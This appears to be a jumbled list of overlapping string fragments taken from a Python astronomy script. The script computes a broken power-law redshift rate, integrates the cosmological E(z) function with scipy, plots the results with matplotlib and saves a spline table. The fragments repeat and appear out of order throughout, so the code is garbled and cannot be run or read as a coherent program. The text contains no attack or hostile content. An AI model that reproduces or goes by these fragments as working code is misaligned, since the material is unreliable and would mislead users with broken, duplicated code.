Eall.reshape(Eall.shape[0],1) d = np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2, R =", "-0.7, z=z) Rp = R / (1+z) * Eall plt.plot(z,Rp,'-k') plt.plot(z,R/(1+z),'--b') plt.plot(z,Eall,'-.r') #plt.plot(z,np.cumsum(Eall),'-g')", "E.reshape(E.shape[0],1) Eics = Eics.reshape(Eics.shape[0],1) Eall = Eall.reshape(Eall.shape[0],1) d = np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2, R", "and int_0^z dz'/E(z') and saves to file def Efunc(z): Omega_m = 0.274 Omega_lambda", "import quad import matplotlib.pyplot as plt def Redshift(n0, n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)): Rlow", "E = Efunc(z) Eics = np.zeros(E.shape) for i in range(len(Eics)): Eics[i] = (quad(Efuncinv,", "Efunc(z) Eics = np.zeros(E.shape) for i in range(len(Eics)): Eics[i] = (quad(Efuncinv, 0, z[i])[0])**2.0", "E) * dz) #Eics[1:] = Eics[:-1] #Eics[0] = 0 Eall = Eics /", "3) + Omega_lambda) return E def Efuncinv(z): return 1.0 / Efunc(z) z =", "E; z = z.reshape(z.shape[0],1) E = E.reshape(E.shape[0],1) Eics = Eics.reshape(Eics.shape[0],1) Eall = Eall.reshape(Eall.shape[0],1)", "E = np.sqrt(Omega_m * np.power((1 + z), 3) + Omega_lambda) return E def", "n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)): Rlow = np.power((1.0 + z), n1) Rhigh = np.power((1.0", "#Eics = np.square(np.cumsum(1.0 / E) * dz) #Eics[1:] = Eics[:-1] #Eics[0] = 0", "np.sqrt(Omega_m * np.power((1 + z), 3) + Omega_lambda) return E def Efuncinv(z): return", "to file def Efunc(z): Omega_m = 0.274 Omega_lambda = 0.726 E = np.sqrt(Omega_m", "-0.7) plt.plot(z,R,'-k') plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid() #plt.gca().set_yscale('log') plt.show() #### This computes E(z) and int_0^z", "= z[1] - z[0] E = Efunc(z) Eics = np.zeros(E.shape) for i in", "= np.square(np.cumsum(1.0 / E) * dz) #Eics[1:] = Eics[:-1] #Eics[0] = 0 
Eall", "+ Omega_lambda) return E def Efuncinv(z): return 1.0 / Efunc(z) z = np.linspace(0,10,num=1001)", "quad import matplotlib.pyplot as plt def Redshift(n0, n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)): Rlow =", "np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2, R = Redshift(0.84, 2.07, -0.7, z=z) Rp = R / (1+z)", "np.power((1.0 + z1), n1 - n2) R = Rlow * (z <= z1)", "rbrk = np.power((1.0 + z1), n1 - n2) R = Rlow * (z", "= np.linspace(0,10,num=1001) dz = z[1] - z[0] E = Efunc(z) Eics = np.zeros(E.shape)", "Omega_lambda = 0.726 E = np.sqrt(Omega_m * np.power((1 + z), 3) + Omega_lambda)", "2.07, -0.7, z=z) Rp = R / (1+z) * Eall plt.plot(z,Rp,'-k') plt.plot(z,R/(1+z),'--b') plt.plot(z,Eall,'-.r')", "np.power((1.0 + z), n2) rbrk = np.power((1.0 + z1), n1 - n2) R", "return 1.0 / Efunc(z) z = np.linspace(0,10,num=1001) dz = z[1] - z[0] E", "plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid() #plt.gca().set_yscale('log') plt.show() #### This computes E(z) and int_0^z dz'/E(z') and", "Eics[i] = (quad(Efuncinv, 0, z[i])[0])**2.0 #Eics = np.square(np.cumsum(1.0 / E) * dz) #Eics[1:]", "np.power((1.0 + z), n1) Rhigh = np.power((1.0 + z), n2) rbrk = np.power((1.0", "= R / (1+z) * Eall plt.plot(z,Rp,'-k') plt.plot(z,R/(1+z),'--b') plt.plot(z,Eall,'-.r') #plt.plot(z,np.cumsum(Eall),'-g') plt.xlabel(r'$z$') plt.grid() plt.show()", "return z, R z, R = Redshift(0.84, 2.07, -0.7) plt.plot(z,R,'-k') plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid()", "/ Efunc(z) z = np.linspace(0,10,num=1001) dz = z[1] - z[0] E = Efunc(z)", "E = E.reshape(E.shape[0],1) Eics = Eics.reshape(Eics.shape[0],1) Eall = Eall.reshape(Eall.shape[0],1) d = np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf')", "Rhigh * (z > z1) R *= n0 / R[0] return z, R", "z=z) Rp = R / (1+z) * Eall plt.plot(z,Rp,'-k') plt.plot(z,R/(1+z),'--b') plt.plot(z,Eall,'-.r') #plt.plot(z,np.cumsum(Eall),'-g') plt.xlabel(r'$z$')", "np from scipy.integrate import quad import matplotlib.pyplot as plt def Redshift(n0, n1, n2,", "i in range(len(Eics)): Eics[i] = (quad(Efuncinv, 0, z[i])[0])**2.0 #Eics = np.square(np.cumsum(1.0 / E)", "E(z) and int_0^z dz'/E(z') and saves to file def Efunc(z): Omega_m = 0.274", "in range(len(Eics)): Eics[i] = (quad(Efuncinv, 0, z[i])[0])**2.0 #Eics = np.square(np.cumsum(1.0 / E) *", "Eics / E; z = z.reshape(z.shape[0],1) E = E.reshape(E.shape[0],1) Eics = Eics.reshape(Eics.shape[0],1) Eall", "= 0.726 E = np.sqrt(Omega_m * np.power((1 + z), 3) + Omega_lambda) return", "#Eics[0] = 0 Eall = Eics / E; z = z.reshape(z.shape[0],1) E =", "= Eics / E; z = z.reshape(z.shape[0],1) E = E.reshape(E.shape[0],1) Eics = Eics.reshape(Eics.shape[0],1)", "z), 3) + Omega_lambda) return E def Efuncinv(z): return 1.0 / Efunc(z) z", "= (quad(Efuncinv, 0, z[i])[0])**2.0 #Eics = np.square(np.cumsum(1.0 / E) * dz) #Eics[1:] =", "as plt def Redshift(n0, n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)): Rlow = np.power((1.0 + z),", "= z.reshape(z.shape[0],1) E = E.reshape(E.shape[0],1) Eics = Eics.reshape(Eics.shape[0],1) Eall = Eall.reshape(Eall.shape[0],1) d =", "This computes E(z) and int_0^z dz'/E(z') and saves to file def Efunc(z): Omega_m", "z2, R = Redshift(0.84, 2.07, -0.7, z=z) Rp = R / (1+z) *", "as np from scipy.integrate import quad import matplotlib.pyplot as plt def Redshift(n0, n1,", "= Eics[:-1] #Eics[0] = 0 Eall = Eics / E; z = z.reshape(z.shape[0],1)", "z = np.linspace(0,10,num=1001) dz = z[1] - z[0] E = Efunc(z) Eics =", "0 Eall = Eics / E; z = 
z.reshape(z.shape[0],1) E = E.reshape(E.shape[0],1) Eics", "0.726 E = np.sqrt(Omega_m * np.power((1 + z), 3) + Omega_lambda) return E", "R = Redshift(0.84, 2.07, -0.7) plt.plot(z,R,'-k') plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid() #plt.gca().set_yscale('log') plt.show() #### This", "plt.plot(z,R,'-k') plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid() #plt.gca().set_yscale('log') plt.show() #### This computes E(z) and int_0^z dz'/E(z')", "R[0] return z, R z, R = Redshift(0.84, 2.07, -0.7) plt.plot(z,R,'-k') plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$')", "+ z), n1) Rhigh = np.power((1.0 + z), n2) rbrk = np.power((1.0 +", "z.reshape(z.shape[0],1) E = E.reshape(E.shape[0],1) Eics = Eics.reshape(Eics.shape[0],1) Eall = Eall.reshape(Eall.shape[0],1) d = np.concatenate((z,E,Eics,Eall),axis=1)", "file def Efunc(z): Omega_m = 0.274 Omega_lambda = 0.726 E = np.sqrt(Omega_m *", "plt.grid() #plt.gca().set_yscale('log') plt.show() #### This computes E(z) and int_0^z dz'/E(z') and saves to", "dz'/E(z') and saves to file def Efunc(z): Omega_m = 0.274 Omega_lambda = 0.726", "1.0 / Efunc(z) z = np.linspace(0,10,num=1001) dz = z[1] - z[0] E =", "def Redshift(n0, n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)): Rlow = np.power((1.0 + z), n1) Rhigh", "Eics[:-1] #Eics[0] = 0 Eall = Eics / E; z = z.reshape(z.shape[0],1) E", "2.07, -0.7) plt.plot(z,R,'-k') plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid() #plt.gca().set_yscale('log') plt.show() #### This computes E(z) and", "import matplotlib.pyplot as plt def Redshift(n0, n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)): Rlow = np.power((1.0", "Eics.reshape(Eics.shape[0],1) Eall = Eall.reshape(Eall.shape[0],1) d = np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2, R = Redshift(0.84, 2.07,", "* Rhigh * (z > z1) R *= n0 / R[0] return z,", "return E def Efuncinv(z): return 1.0 / Efunc(z) z = np.linspace(0,10,num=1001) dz =", "n2) R = Rlow * (z <= z1) + rbrk * Rhigh *", "np.linspace(0,10,num=1001) dz = z[1] - z[0] E = Efunc(z) Eics = np.zeros(E.shape) for", "= E.reshape(E.shape[0],1) Eics = Eics.reshape(Eics.shape[0],1) Eall = Eall.reshape(Eall.shape[0],1) d = np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2,", "+ z), 3) + Omega_lambda) return E def Efuncinv(z): return 1.0 / Efunc(z)", "Eall = Eall.reshape(Eall.shape[0],1) d = np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2, R = Redshift(0.84, 2.07, -0.7," ]
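As a companion sketch (not in the original script), the saved table can be read back and turned into an interpolator; the only assumption is the four-column layout (z, E, Eics, Eall) written by np.savetxt above.

# Illustrative read-back of support_data/splines_Ez.txt.
import numpy as np
from scipy.interpolate import interp1d

z_tab, E_tab, Eics_tab, Eall_tab = np.loadtxt('support_data/splines_Ez.txt').T
E_of_z = interp1d(z_tab, E_tab, kind='cubic')  # smooth E(z) from the tabulated values
print(E_of_z(0.5))  # E(z) evaluated at z = 0.5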
[ "stones[0..i] are merged whose value is prefix[i] dp = [-math.inf] * n #", "whose value is prefix[i] dp = [-math.inf] * n # must take all", "value is prefix[i] dp = [-math.inf] * n # must take all when", "# must take all when there're only two stones left dp[n - 2]", "Solution: def stoneGameVIII(self, stones: List[int]) -> int: n = len(stones) prefix = list(accumulate(stones))", "stones left dp[n - 2] = prefix[-1] for i in reversed(range(n - 2)):", "game starts # at i, i.e., stones[0..i] are merged whose value is prefix[i]", "= [-math.inf] * n # must take all when there're only two stones", "= list(accumulate(stones)) # dp[i] := max score diff the current player can get", "- 2] = prefix[-1] for i in reversed(range(n - 2)): dp[i] = max(dp[i", "- 2)): dp[i] = max(dp[i + 1], prefix[i + 1] - dp[i +", "dp[i] := max score diff the current player can get when the game", "when the game starts # at i, i.e., stones[0..i] are merged whose value", "VIII/1872.py class Solution: def stoneGameVIII(self, stones: List[int]) -> int: n = len(stones) prefix", "when there're only two stones left dp[n - 2] = prefix[-1] for i", "max score diff the current player can get when the game starts #", "prefix[-1] for i in reversed(range(n - 2)): dp[i] = max(dp[i + 1], prefix[i", "score diff the current player can get when the game starts # at", "def stoneGameVIII(self, stones: List[int]) -> int: n = len(stones) prefix = list(accumulate(stones)) #", "i.e., stones[0..i] are merged whose value is prefix[i] dp = [-math.inf] * n", "* n # must take all when there're only two stones left dp[n", "dp[n - 2] = prefix[-1] for i in reversed(range(n - 2)): dp[i] =", "2] = prefix[-1] for i in reversed(range(n - 2)): dp[i] = max(dp[i +", "player can get when the game starts # at i, i.e., stones[0..i] are", "are merged whose value is prefix[i] dp = [-math.inf] * n # must", "reversed(range(n - 2)): dp[i] = max(dp[i + 1], prefix[i + 1] - dp[i", "starts # at i, i.e., stones[0..i] are merged whose value is prefix[i] dp", "n # must take all when there're only two stones left dp[n -", "for i in reversed(range(n - 2)): dp[i] = max(dp[i + 1], prefix[i +", "2)): dp[i] = max(dp[i + 1], prefix[i + 1] - dp[i + 1])", "len(stones) prefix = list(accumulate(stones)) # dp[i] := max score diff the current player", "can get when the game starts # at i, i.e., stones[0..i] are merged", "[-math.inf] * n # must take all when there're only two stones left", "there're only two stones left dp[n - 2] = prefix[-1] for i in", "n = len(stones) prefix = list(accumulate(stones)) # dp[i] := max score diff the", "the current player can get when the game starts # at i, i.e.,", "Game VIII/1872.py class Solution: def stoneGameVIII(self, stones: List[int]) -> int: n = len(stones)", "List[int]) -> int: n = len(stones) prefix = list(accumulate(stones)) # dp[i] := max", "-> int: n = len(stones) prefix = list(accumulate(stones)) # dp[i] := max score", "prefix = list(accumulate(stones)) # dp[i] := max score diff the current player can", "diff the current player can get when the game starts # at i,", "current player can get when the game starts # at i, i.e., stones[0..i]", "i, i.e., stones[0..i] are merged whose value is prefix[i] dp = [-math.inf] *", "Stone Game VIII/1872.py class Solution: def stoneGameVIII(self, stones: List[int]) -> int: n =", ":= max score diff the current player can get when the game starts", "prefix[i] dp = [-math.inf] * n # must take all when there're only", "only two stones left dp[n - 2] = prefix[-1] for i in reversed(range(n", "in reversed(range(n 
- 2)): dp[i] = max(dp[i + 1], prefix[i + 1] -", "stoneGameVIII(self, stones: List[int]) -> int: n = len(stones) prefix = list(accumulate(stones)) # dp[i]", "# dp[i] := max score diff the current player can get when the", "dp = [-math.inf] * n # must take all when there're only two", "take all when there're only two stones left dp[n - 2] = prefix[-1]", "merged whose value is prefix[i] dp = [-math.inf] * n # must take", "two stones left dp[n - 2] = prefix[-1] for i in reversed(range(n -", "= max(dp[i + 1], prefix[i + 1] - dp[i + 1]) return dp[0]", "= prefix[-1] for i in reversed(range(n - 2)): dp[i] = max(dp[i + 1],", "list(accumulate(stones)) # dp[i] := max score diff the current player can get when", "get when the game starts # at i, i.e., stones[0..i] are merged whose", "# at i, i.e., stones[0..i] are merged whose value is prefix[i] dp =", "left dp[n - 2] = prefix[-1] for i in reversed(range(n - 2)): dp[i]", "class Solution: def stoneGameVIII(self, stones: List[int]) -> int: n = len(stones) prefix =", "dp[i] = max(dp[i + 1], prefix[i + 1] - dp[i + 1]) return", "int: n = len(stones) prefix = list(accumulate(stones)) # dp[i] := max score diff", "i in reversed(range(n - 2)): dp[i] = max(dp[i + 1], prefix[i + 1]", "= len(stones) prefix = list(accumulate(stones)) # dp[i] := max score diff the current", "must take all when there're only two stones left dp[n - 2] =", "the game starts # at i, i.e., stones[0..i] are merged whose value is", "is prefix[i] dp = [-math.inf] * n # must take all when there're", "stones: List[int]) -> int: n = len(stones) prefix = list(accumulate(stones)) # dp[i] :=", "at i, i.e., stones[0..i] are merged whose value is prefix[i] dp = [-math.inf]", "all when there're only two stones left dp[n - 2] = prefix[-1] for", "<filename>Leetcode/1000-2000/1872. Stone Game VIII/1872.py class Solution: def stoneGameVIII(self, stones: List[int]) -> int: n" ]
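A quick sanity check of the recurrence, using what is, to the best of my knowledge, the standard example for this problem:

# With stones = [-1, 2, -3, 4, -5], prefix sums are [-1, 1, -2, 2, -3].
# Working backwards: dp[3] = -3, dp[2] = max(-3, 2 - (-3)) = 5,
# dp[1] = max(5, -2 - 5) = 5, dp[0] = max(5, 1 - 5) = 5.
print(Solution().stoneGameVIII([-1, 2, -3, 4, -5]))  # expected: 5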
[ "kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return kb def generate_keyboard_cinema_time(): kb_content = QuickReplyContentText( header=\"Кинотеатр\", text=\"Выберите удобное для Вас", "из предложенного списка\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return kb", "kb def generate_keyboard_restaurant_time(): kb_content = QuickReplyContentText( header=\"Ресторан\", text=\"Выберите удобное для Вас время\", caption=\"\",", "kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return kb def generate_keyboard_restaurant_time(): kb_content = QuickReplyContentText(", "return kb def generate_keyboard_cinema_time(): kb_content = QuickReplyContentText( header=\"Кинотеатр\", text=\"Выберите удобное для Вас время\",", "content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return kb def generate_keyboard_cinema_time(): kb_content = QuickReplyContentText( header=\"Кинотеатр\", text=\"Выберите удобное для", "header=\"Ресторан\", text=\"Выберите удобное для Вас время\", caption=\"\", ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"), content=kb_content)", "kb_content = QuickReplyContentText( header=\"Ресторан\", text=\"Выберите удобное для Вас время\", caption=\"\", ) kb =", "kb_content = QuickReplyContentText( header=\"Куда вы сегодня хотите сходить?\", text=\"Выберите из предложенного списка\", caption=\"\"", "QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this is the body\", caption=\"this is the footer\" ) kb =", ") kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return kb def generate_keyboard_image(): # Можно", "text=\"Выберите удобное для Вас время\", caption=\"\", ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00'))", "Вас время\", caption=\"\", ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return kb def", "return kb def generate_keyboard_restaurant_time(): kb_content = QuickReplyContentText( header=\"Ресторан\", text=\"Выберите удобное для Вас время\",", "хотите сходить?\", text=\"Выберите из предложенного списка\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"), content=kb_content)", "caption=\"\", ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return kb def generate_keyboard_image(): #", "время\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return kb def generate_keyboard_restaurant_time():", ") kb = 
QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return kb def generate_keyboard_cinema_time(): kb_content =", "Вас время\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return kb def", "kb_content = QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this is the body\", caption=\"this is the footer\" )", "сегодня хотите сходить?\", text=\"Выберите из предложенного списка\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"),", "QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return kb def generate_keyboard_restaurant_time(): kb_content = QuickReplyContentText( header=\"Ресторан\", text=\"Выберите", "generate_keyboard_place(): kb_content = QuickReplyContentText( header=\"Куда вы сегодня хотите сходить?\", text=\"Выберите из предложенного списка\",", "= QuickReplyContentText( header=\"Кинотеатр\", text=\"Выберите удобное для Вас время\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\",", "= QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return kb def generate_keyboard_cinema_time(): kb_content = QuickReplyContentText( header=\"Кинотеатр\",", "import QuickReplyContentText, QuickReply, KeyboardButton, QuickReplyContentImage from callback import callback_reply_keyboard def generate_keyboard_place(): kb_content =", "для Вас время\", caption=\"\", ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return kb", "QuickReply, KeyboardButton, QuickReplyContentImage from callback import callback_reply_keyboard def generate_keyboard_place(): kb_content = QuickReplyContentText( header=\"Куда", "def generate_keyboard_cinema_time(): kb_content = QuickReplyContentText( header=\"Кинотеатр\", text=\"Выберите удобное для Вас время\", caption=\"\" )", "kb def generate_keyboard_image(): # Можно отправить клавиатуру с изображением, вместо заголовка. В примере", "def generate_keyboard_restaurant_time(): kb_content = QuickReplyContentText( header=\"Ресторан\", text=\"Выберите удобное для Вас время\", caption=\"\", )", "header=\"Кинотеатр\", text=\"Выберите удобное для Вас время\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"), content=kb_content)", "вместо заголовка. В примере не использовалось kb_content = QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this is the", "text=\"Выберите из предложенного списка\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return", "generate_keyboard_image(): # Можно отправить клавиатуру с изображением, вместо заголовка. 
В примере не использовалось", "caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return kb def generate_keyboard_restaurant_time(): kb_content", "= QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return kb def generate_keyboard_restaurant_time(): kb_content = QuickReplyContentText( header=\"Ресторан\",", "предложенного списка\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return kb def", "клавиатуру с изображением, вместо заголовка. В примере не использовалось kb_content = QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\",", "callback import callback_reply_keyboard def generate_keyboard_place(): kb_content = QuickReplyContentText( header=\"Куда вы сегодня хотите сходить?\",", "text=\"this is the body\", caption=\"this is the footer\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(type=\"start\", id=\"1\"),", "the body\", caption=\"this is the footer\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(type=\"start\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Сменить", "заголовка. В примере не использовалось kb_content = QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this is the body\",", "kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return kb def generate_keyboard_image(): # Можно отправить", "примере не использовалось kb_content = QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this is the body\", caption=\"this is", "В примере не использовалось kb_content = QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this is the body\", caption=\"this", "QuickReplyContentText, QuickReply, KeyboardButton, QuickReplyContentImage from callback import callback_reply_keyboard def generate_keyboard_place(): kb_content = QuickReplyContentText(", "QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return kb def generate_keyboard_image(): # Можно отправить клавиатуру с", "content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return kb def generate_keyboard_image(): # Можно отправить клавиатуру с изображением, вместо", "с изображением, вместо заголовка. 
В примере не использовалось kb_content = QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this", "kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return kb def generate_keyboard_cinema_time(): kb_content = QuickReplyContentText(", "waio.keyboard.reply import QuickReplyContentText, QuickReply, KeyboardButton, QuickReplyContentImage from callback import callback_reply_keyboard def generate_keyboard_place(): kb_content", "def generate_keyboard_image(): # Можно отправить клавиатуру с изображением, вместо заголовка. В примере не", "kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return kb def generate_keyboard_restaurant_time(): kb_content = QuickReplyContentText( header=\"Ресторан\", text=\"Выберите удобное для Вас", "QuickReplyContentText( header=\"Ресторан\", text=\"Выберите удобное для Вас время\", caption=\"\", ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"),", "def generate_keyboard_place(): kb_content = QuickReplyContentText( header=\"Куда вы сегодня хотите сходить?\", text=\"Выберите из предложенного", "url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this is the body\", caption=\"this is the footer\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(type=\"start\",", "вы сегодня хотите сходить?\", text=\"Выберите из предложенного списка\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\",", "QuickReplyContentText( header=\"Куда вы сегодня хотите сходить?\", text=\"Выберите из предложенного списка\", caption=\"\" ) kb", "body\", caption=\"this is the footer\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(type=\"start\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Сменить ресторан')).add(KeyboardButton(title='Новый", "text=\"Выберите удобное для Вас время\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00'))", "KeyboardButton, QuickReplyContentImage from callback import callback_reply_keyboard def generate_keyboard_place(): kb_content = QuickReplyContentText( header=\"Куда вы", "время\", caption=\"\", ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return kb def generate_keyboard_image():", "для Вас время\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return kb", "= QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this is the body\", caption=\"this is the footer\" ) kb", "id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return kb def generate_keyboard_cinema_time(): kb_content = QuickReplyContentText( header=\"Кинотеатр\", text=\"Выберите удобное", "kb def generate_keyboard_cinema_time(): kb_content = QuickReplyContentText( header=\"Кинотеатр\", text=\"Выберите удобное для Вас время\", caption=\"\"", "отправить клавиатуру с изображением, вместо 
заголовка. В примере не использовалось kb_content = QuickReplyContentImage(", "generate_keyboard_cinema_time(): kb_content = QuickReplyContentText( header=\"Кинотеатр\", text=\"Выберите удобное для Вас время\", caption=\"\" ) kb", "= QuickReplyContentText( header=\"Куда вы сегодня хотите сходить?\", text=\"Выберите из предложенного списка\", caption=\"\" )", "content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return kb def generate_keyboard_restaurant_time(): kb_content = QuickReplyContentText( header=\"Ресторан\", text=\"Выберите удобное для", "return kb def generate_keyboard_image(): # Можно отправить клавиатуру с изображением, вместо заголовка. В", "the footer\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(type=\"start\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Сменить ресторан')).add(KeyboardButton(title='Новый ресторан')) return kb", "= QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return kb def generate_keyboard_image(): # Можно отправить клавиатуру", ") kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return kb def generate_keyboard_restaurant_time(): kb_content =", "QuickReplyContentText( header=\"Кинотеатр\", text=\"Выберите удобное для Вас время\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"),", "QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return kb def generate_keyboard_cinema_time(): kb_content = QuickReplyContentText( header=\"Кинотеатр\", text=\"Выберите", "caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"), content=kb_content) 